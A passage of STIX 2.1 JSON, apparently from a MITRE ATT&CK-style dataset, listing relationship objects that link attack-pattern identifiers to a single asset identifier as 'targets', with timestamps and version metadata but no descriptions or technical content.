"2024-07-01T10:37:15.830640", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e3ee7eb-fc83-42dc-9f18-2c59008b0f07", "created": "2024-07-01T10:37:15.830648", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830650", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--88fd7056-9c65-424d-99c7-fe6c7c612c2e", "created": "2024-07-01T10:37:15.830658", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830660", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a21035d0-a018-4d4b-8f60-6f30e9f861c3", "created": "2024-07-01T10:37:15.830668", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830670", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b053dfbd-b604-49fc-8de7-dbf3e5fb896e", "created": "2024-07-01T10:37:15.830678", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830680", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--243310c5-6bae-472f-98de-bb8d7b7801fe", "created": "2024-07-01T10:37:15.830688", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830690", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c142cb97-ca39-4cad-bf36-16532143e38e", "created": "2024-07-01T10:37:15.830698", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830700", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1784eea3-bef9-440e-a888-494783a43cf9", "created": "2024-07-01T10:37:15.830707", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830709", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c81207ca-4bc6-462c-aad4-d27d1d8796dd", "created": "2024-07-01T10:37:15.830717", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830720", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e13856e7-f78d-45d1-adec-54430e92b2c3", "created": "2024-07-01T10:37:15.830727", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830729", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2fc655fa-292c-4ca5-9241-e63b7d5a2ead", "created": "2024-07-01T10:37:15.830737", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830739", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1332390d-3c75-4710-ace8-4b3f58967392", "created": "2024-07-01T10:37:15.830747", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830749", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b6c99978-3c89-4d5c-9862-61e5e64051bf", "created": "2024-07-01T10:37:15.830757", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830759", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a782ebe2-daba-42c7-bc82-e8e9d923162d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--799e450f-3f7b-477d-bcc8-2956fe495c3e", "created": "2024-07-01T10:37:15.830767", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830769", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78c7861d-0da3-46d9-9cd3-7421e6f0c3a4", "created": "2024-07-01T10:37:15.830777", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830779", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1d0ac707-916e-4946-862a-535a6ccc3ddb", "created": "2024-07-01T10:37:15.830787", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830789", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e57f7c8f-b8e6-48b4-8d9b-310820f0ffd4", "created": "2024-07-01T10:37:15.830797", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830799", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e12c9bc9-05e9-402b-99f4-b3b24c41220f", "created": "2024-07-01T10:37:15.830807", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830809", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4eed6aaf-4d6e-4d2d-90f8-981152c4c02a", "created": "2024-07-01T10:37:15.830817", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830819", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ad255bfe-a9e6-4b52-a258-8d3462abe842", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b988009a-bbaa-4e07-9956-f108d57d9751", "created": "2024-07-01T10:37:15.830826", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830829", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7b5c040-9504-42b2-b494-320f2118faf9", "created": "2024-07-01T10:37:15.830836", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830838", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fe6e9ce2-4592-41e1-8f1f-6d72066d42c0", "created": "2024-07-01T10:37:15.830846", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830848", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--71fa8ea1-9994-48cb-97a0-0f82fe86c14f", "created": "2024-07-01T10:37:15.830856", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830858", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2a0c563-1868-4d05-9fcf-f6a71b98686a", "created": "2024-07-01T10:37:15.830866", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830868", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--65639330-ce4b-4f32-81c4-4a6f4e616363", "created": "2024-07-01T10:37:15.830876", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830878", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b214ffca-07d4-45ec-ae63-391d525389aa", "created": "2024-07-01T10:37:15.830886", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830888", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b21c3b2d-02e6-45b1-980b-e69051040839", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b4d4bea8-43cb-495e-8a7b-0425a3929931", "created": "2024-07-01T10:37:15.830896", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830898", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0bd43a00-c3ec-4dd0-badc-738108d994ee", "created": "2024-07-01T10:37:15.830906", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830908", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--286c3e74-c7d2-44a1-8bab-9415d6dda0d9", "created": "2024-07-01T10:37:15.830916", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830918", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f694d71-b9fe-40b2-8315-9871de6905d0", "created": "2024-07-01T10:37:15.830926", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830928", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9793f028-51af-490a-a177-9147e21e2340", "created": "2024-07-01T10:37:15.830936", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830938", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--100deef3-82fa-4dea-bd4d-2e1e361ccb29", "created": "2024-07-01T10:37:15.830946", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830948", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15a5ff8a-3f83-412c-9c9a-4825233f33f5", "created": "2024-07-01T10:37:15.830956", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830958", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b4c78fe-5ddf-40db-9e88-2fb7319fbe90", "created": "2024-07-01T10:37:15.830966", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830968", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b5327dd1-6bf9-4785-a199-25bcbd1f4a9d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--76805003-9de2-4253-9734-89cd24c737b4", "created": "2024-07-01T10:37:15.830975", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830978", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5370221-993f-476f-be38-54440643b1ab", "created": "2024-07-01T10:37:15.830985", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830987", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--29ded7ec-f381-4cc1-90ae-2c473b055455", "created": "2024-07-01T10:37:15.830995", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.830997", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ef934cc1-4e99-4d49-878c-b5bd3b1a1cdc", "created": "2024-07-01T10:37:15.831005", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831007", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f88541a3-ddfb-447f-806d-a564f5cc64b0", "created": "2024-07-01T10:37:15.831015", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831017", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1be9e72c-918c-4c7f-9064-e2b82bd255d5", "created": "2024-07-01T10:37:15.831025", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831027", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2042d3aa-8cd3-4e35-a330-2fb7b44ebe19", "created": "2024-07-01T10:37:15.831035", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831037", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--52b96bdd-0389-4085-8044-aa953e12dd95", "created": "2024-07-01T10:37:15.831044", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831047", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": 